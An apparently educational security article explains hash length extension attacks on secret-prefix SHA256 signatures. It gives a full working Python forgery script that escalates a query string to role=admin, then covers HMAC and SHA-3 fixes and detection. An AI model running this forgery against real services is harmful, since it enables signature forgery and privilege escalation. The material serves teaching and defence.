Hash Length Extension Attack: How to Forge a MAC Without the Secret

You built a tiny security check. Take a secret key, stick the message after it, hash the whole thing, and send that hash as a signature. If someone tampers with the message, the hash will not match, so you are safe. That feeling of safety is wrong. A hash length extension attack lets an attacker take your signature and the message, append their own data, and produce a valid signature for the longer message, all without ever learning the secret key.

The broken pattern: a MAC built as H(secret || message)

A message authentication code, or MAC, proves two things at once. The message has not changed, and it came from someone who holds the secret. The naive way to build one is to glue the secret in front of the message and hash it:

sig = SHA256(secret + message)

The server knows the secret, recomputes SHA256(secret + message) on each request, and checks the sig matches. Looks reasonable. The secret is never sent, an attacker cannot guess it, and any edit to the message changes the hash. The problem is not the secret. It is how SHA256, SHA1, and MD5 are built on the inside.
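A minimal sketch of this pattern in Python, for illustration only. The secret value and the function names naive_sign and naive_verify are hypothetical, not taken from any real codebase.

```python
import hashlib
import hmac

SECRET = b"hypothetical-secret"  # assumed value, for illustration only

def naive_sign(message: bytes) -> str:
    # The broken pattern: a plain hash over secret || message.
    return hashlib.sha256(SECRET + message).hexdigest()

def naive_verify(message: bytes, sig: str) -> bool:
    # Recompute and compare; compare_digest avoids a timing side channel.
    return hmac.compare_digest(naive_sign(message), sig)

sig = naive_sign(b"user=bob&role=user")
print(naive_verify(b"user=bob&role=user", sig))   # True
print(naive_verify(b"user=bob&role=admin", sig))  # False
```

A direct edit to the message is rejected, which is exactly why the scheme looks sound at first glance.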

Merkle Damgard: why the digest is resumable state

MD5, SHA1, and SHA256 all share a design called the Merkle Damgard construction, named after its two inventors. It works in three steps.

  • Pad the input. The hash works on fixed size blocks, 64 bytes for these functions. A padding tail is added so the total length is a clean multiple of the block size: a single 0x80 byte, then as many zero bytes as needed, then the original message length in bits, encoded as a 64-bit integer, at the very end.
  • Process block by block. Start with a fixed initial state. Mix in the first block, then mix the next block into the updated state, and keep going until every block is consumed.
  • Output the state. When the last block is done, the internal state IS the final hash. The digest you print as hex is a direct copy of the machine’s internal registers.
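The padding step can be sketched in a few lines of Python. This is an illustrative helper, not library code: the name sha256_padding is hypothetical, and it follows the SHA256 and SHA1 convention of a big-endian length field (MD5 stores the length little-endian instead).

```python
import struct

BLOCK_SIZE = 64  # bytes, for MD5, SHA1, and SHA256

def sha256_padding(message_len: int) -> bytes:
    # One 0x80 byte, then zeros, then the 64-bit bit length, so that
    # message_len + len(padding) is a multiple of the block size.
    zero_count = (BLOCK_SIZE - 9 - message_len) % BLOCK_SIZE
    length_bits = struct.pack(">Q", message_len * 8)
    return b"\x80" + b"\x00" * zero_count + length_bits

pad = sha256_padding(len(b"abc"))
print(len(pad))        # 61, so 3 + 61 = 64 bytes, exactly one block
print(pad[-8:].hex())  # 0000000000000018, i.e. 24 bits
```

Note that the padding depends only on the length of the input, never on its content. That is what later lets an attacker compute it without knowing the secret.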

Read that last point again, because it is the whole attack. The output is not a one way summary of the state. It is the state. Nothing is hidden or thrown away on the way out.

Because the digest is the internal state, copied straight out, whoever holds the digest can sit down at the machine and keep hashing from exactly where it stopped.
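To make that concrete for SHA256: its internal state is eight 32-bit words, and the 32 byte digest is those words written out big-endian. A small sketch of reading them back, with variable names chosen here for illustration:

```python
import hashlib
import struct

digest = hashlib.sha256(b"abc").digest()

# Split the 32 byte digest back into the eight 32-bit state words.
registers = struct.unpack(">8I", digest)
print(len(digest), len(registers))  # 32 8

# Repacking the words reproduces the digest byte for byte:
# nothing is lost between the state and the output.
print(struct.pack(">8I", *registers) == digest)  # True
```

Python's hashlib offers no way to load these words back into a hash object, so continuing the computation needs a separate implementation of the compression function.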

How a hash length extension attack actually works

Imagine the server signs API requests with SHA256(secret + message). You intercept one, so you have the message and the signature but not the secret. Here is what you can do anyway.

The signature you hold is the internal state of the hash right after it processed secret + message + padding. Load that state into your own SHA256 engine, resume hashing as if it never stopped, and feed it any extra bytes you want. The new output is a valid hash of secret + message + padding + extra, produced without the secret.

A concrete example: from user to admin

Say the signed request is a query string. The server hashed the secret plus the parameters after the question mark, not counting the sig field itself.

?user=bob&role=user&sig=2f1a...c9

You want to add &role=admin and still have a valid sig. You do not know the secret, but you can guess its length and try each likely value in turn. For one guess, the steps are:

  • Load the known sig value as the resumable state of a fresh SHA256.
  • Work out the padding the hash would have added after secret + "user=bob&role=user". That depends only on the total length, which is the secret length guess plus the known message length.
  • Resume the hash, feed it your extra data &role=admin, and read out the new digest. That is your forged signature.

The message you send is the original bytes, then the glue padding, then your extra data:

user=bob&role=user\x80\x00\x00...[length bits]...&role=admin

When the server computes SHA256(secret + that_whole_thing), it lands on the exact state you predicted, so your forged sig matches. The padding bytes end up inside the value of the first role parameter, and many query string and form parsers treat duplicate keys as last value wins, so the server reads role=admin and you are now an admin. You never saw the secret. You only needed the original message, its hash, and a guess at the secret length. Computing a forgery for every length from 1 to 64 takes well under a second, and each candidate then costs one request to the server to test. A tool called hash_extender does the whole computation for you.
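The whole example can be sketched end to end in Python. This is an illustration under stated assumptions, not how hash_extender is implemented: the secret, the server_accepts check, and all function names are hypothetical, and the SHA256 compression function is written out by hand only because hashlib cannot resume from a chosen state.

```python
import hashlib
import struct

MASK = 0xFFFFFFFF

def icbrt(n):
    # Exact integer cube root by binary search (no floating point).
    lo, hi = 0, 1 << 40
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if mid ** 3 <= n:
            lo = mid
        else:
            hi = mid - 1
    return lo

def first_primes(count):
    primes, n = [], 2
    while len(primes) < count:
        if all(n % p for p in primes):
            primes.append(n)
        n += 1
    return primes

# Round constants: 32 fractional bits of the cube roots of the first 64 primes.
K = [icbrt(p << 96) & MASK for p in first_primes(64)]

def rotr(x, n):
    return ((x >> n) | (x << (32 - n))) & MASK

def compress(state, block):
    # One SHA256 compression step: mix a 64 byte block into the state.
    w = list(struct.unpack(">16I", block))
    for i in range(16, 64):
        s0 = rotr(w[i - 15], 7) ^ rotr(w[i - 15], 18) ^ (w[i - 15] >> 3)
        s1 = rotr(w[i - 2], 17) ^ rotr(w[i - 2], 19) ^ (w[i - 2] >> 10)
        w.append((w[i - 16] + s0 + w[i - 7] + s1) & MASK)
    a, b, c, d, e, f, g, h = state
    for i in range(64):
        big_s1 = rotr(e, 6) ^ rotr(e, 11) ^ rotr(e, 25)
        ch = (e & f) ^ (~e & g)
        t1 = (h + big_s1 + ch + K[i] + w[i]) & MASK
        big_s0 = rotr(a, 2) ^ rotr(a, 13) ^ rotr(a, 22)
        maj = (a & b) ^ (a & c) ^ (b & c)
        t2 = (big_s0 + maj) & MASK
        h, g, f, e, d, c, b, a = g, f, e, (d + t1) & MASK, c, b, a, (t1 + t2) & MASK
    return [(x + y) & MASK for x, y in zip(state, [a, b, c, d, e, f, g, h])]

def padding(total_len):
    zeros = (55 - total_len) % 64
    return b"\x80" + b"\x00" * zeros + struct.pack(">Q", total_len * 8)

def extend(sig_hex, message, extra, secret_len):
    # Step 1: load the known signature as the resumable state.
    state = list(struct.unpack(">8I", bytes.fromhex(sig_hex)))
    # Step 2: the glue padding depends only on the guessed total length.
    glue = padding(secret_len + len(message))
    forged_msg = message + glue + extra
    # Step 3: resume hashing with the extra data plus its own final padding.
    tail = extra + padding(secret_len + len(forged_msg))
    for i in range(0, len(tail), 64):
        state = compress(state, tail[i:i + 64])
    return forged_msg, struct.pack(">8I", *state).hex()

# Demo. The server side below is hypothetical and only plays the victim.
SECRET = b"hypothetical-secret"

def server_accepts(message, sig_hex):
    return hashlib.sha256(SECRET + message).hexdigest() == sig_hex

message = b"user=bob&role=user"
sig = hashlib.sha256(SECRET + message).hexdigest()  # the intercepted signature

found = None
for guess in range(1, 65):  # brute force the secret length
    forged_msg, forged_sig = extend(sig, message, b"&role=admin", guess)
    if server_accepts(forged_msg, forged_sig):
        found = guess
        break
print(found)  # the secret length for which the forgery was accepted
```

The attacker side (extend and the loop) never touches SECRET. Only the stand-in server does, and each wrong length guess simply produces a forgery that the server rejects.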

Why this breaks naive secret prefix MACs but not encryption

The attack does not decrypt anything and does not reveal the secret. It just continues a computation. That narrow ability is enough, because the only thing standing between an attacker and a valid signature is the ability to compute the final hash, and the published hash hands them the starting point for free.

It is the same family of mistake as trusting a value you do not fully control. A padding oracle attack turns a small leak about padding into full plaintext recovery, and a JWT algorithm confusion attack tricks a verifier into accepting a token signed the wrong way. All three share a root: a design assumed an attacker could not do one thing, and the construction quietly let them do it.

The fix: use HMAC, or a hash that resists this

The good news is that this is a solved problem.

  • Use HMAC. HMAC wraps the hash in two keyed passes, roughly H(key2 + H(key1 + message)), where key1 and key2 are both derived from the one secret key by XOR with fixed pad constants. The outer hash hides the inner state, so the published value is no longer a resumable state of secret + message. Length extension does not work against it. Use HMAC with SHA256 and you can keep your existing hash function.
  • Or use a hash that resists length extension by design. SHA-3 uses a sponge construction, which keeps part of its state out of the output, and BLAKE2 has built in keying. Neither exposes a resumable internal state in the output, so H(secret + message) with these is not vulnerable to this attack. HMAC is still the more standard choice for a MAC.
  • Never roll your own keyed hash. SHA256(secret + message) looks obviously fine and is obviously broken. Stop hand building MAC schemes from raw hash functions and call the HMAC function your language already ships.
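In Python the fix is a call into the standard hmac module. The sketch below also spells out the two keyed passes by hand, purely to show the structure described above. The key value and the function names sign, verify, and hmac_by_hand are hypothetical, and real code should use only the library call.

```python
import hashlib
import hmac

KEY = b"hypothetical-secret"  # assumed value, for illustration only

def sign(message: bytes) -> str:
    return hmac.new(KEY, message, hashlib.sha256).hexdigest()

def verify(message: bytes, sig: str) -> bool:
    # Constant time comparison of the recomputed and supplied tags.
    return hmac.compare_digest(sign(message), sig)

def hmac_by_hand(key: bytes, message: bytes) -> str:
    # Shows the two keyed passes; do not use this in place of hmac.new.
    if len(key) > 64:
        key = hashlib.sha256(key).digest()
    key = key.ljust(64, b"\x00")
    inner_key = bytes(b ^ 0x36 for b in key)
    outer_key = bytes(b ^ 0x5C for b in key)
    inner = hashlib.sha256(inner_key + message).digest()
    return hashlib.sha256(outer_key + inner).hexdigest()

msg = b"user=bob&role=user"
print(hmac_by_hand(KEY, msg) == sign(msg))  # True
print(verify(msg, sign(msg)))               # True
```

An attacker who sees the tag holds the state of the outer hash only, and extending that hash does not yield a valid tag for any longer message.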

If you inherit code that signs with a bare hash(secret + data), treat it as a finding, not a style nitpick. Swapping it to HMAC is a small change with a large payoff.

How to spot it in a real app

You rarely see the words “length extension” in a codebase. You see the shape that allows it:

  • A signature computed as md5(secret . data), sha1(key + payload), or any concatenation of a key and a message fed straight into a plain hash.
  • An API that accepts a sig field and verifies it by recomputing a hash over a secret and request data.
  • Parameters where the last duplicate key wins, which lets an appended &role=admin override the real value cleanly.
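Whether an appended parameter overrides the original depends on the parser, so it is worth checking rather than assuming. As one illustration, here is how Python's standard urllib.parse treats a forged query string. The padding is shortened to three bytes for readability, and other languages and frameworks may behave differently.

```python
from urllib.parse import parse_qs, parse_qsl, quote

# Forged message with the glue padding shortened for readability.
forged = b"user=bob&role=user\x80\x00\x00&role=admin"
query = quote(forged, safe="=&")  # percent-encode the raw padding bytes
print(query)  # user=bob&role=user%80%00%00&role=admin

# Building a dict from the pairs keeps the last value for each key.
as_dict = dict(parse_qsl(query, encoding="latin-1"))
print(as_dict["role"])  # admin

# parse_qs keeps every value, so the outcome depends on which one the app reads.
roles = parse_qs(query, encoding="latin-1")["role"]
print(len(roles))  # 2
```

Code that reads the first value, or that rejects duplicate keys outright, would not grant admin here, although the forged signature itself would still verify.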

A scanner looking for known bad strings walks right past sha256(secret + message), because there is no payload to match. The bug is in the design assumption, not in any one line. Catching it means understanding what the code is trying to prove and asking whether the math actually proves it. That is the kind of reasoning an autonomous researcher that tests assumptions is built for. In our own early work a frontier model drove the full methodology on its own and identified and verified real access control and injection issues in test applications it had not seen before, an encouraging early signal rather than a benchmark. For the wider approach, read more on our about page.

Frequently asked questions

What is a hash length extension attack?

It is an attack against signatures built as a plain hash of a secret followed by a message, like SHA256(secret + message). Because hashes such as MD5, SHA1, and SHA256 use the Merkle Damgard construction, their output is the resumable internal state of the hash. An attacker who knows the original message, its hash, and the length of the secret can resume the computation and append extra data, producing a valid hash for the longer message without ever learning the secret.

Which hash functions are vulnerable?

The Merkle Damgard hashes that publish their full internal state as the digest are vulnerable: MD5, SHA1, SHA256, and SHA512. Truncated variants such as SHA-384 and SHA-512/256 hold back part of the state, which blocks the attack. SHA-3 uses a sponge construction and BLAKE2 has built in keying, so neither leaks a resumable state and neither is vulnerable to this attack. The vulnerability is in how the bare hash is used as a MAC, not only in the hash itself.

Does the attacker need to know the secret?

No. That is what makes the attack work. The attacker needs the original message, the original hash, and the length of the secret. The secret length can be brute forced by trying each value from 1 to about 64, since each guess produces a candidate forgery to test. The secret itself is never recovered and never needs to be.

How do you fix a hash length extension attack?

Use HMAC instead of a hand built keyed hash. HMAC wraps the hash in two keyed passes, so the published value is no longer a resumable internal state and length extension fails. Reach for HMAC-SHA256 from your standard library. You can also use SHA-3 or BLAKE2, which are not vulnerable, but the main rule is to never roll your own MAC as hash(secret + message).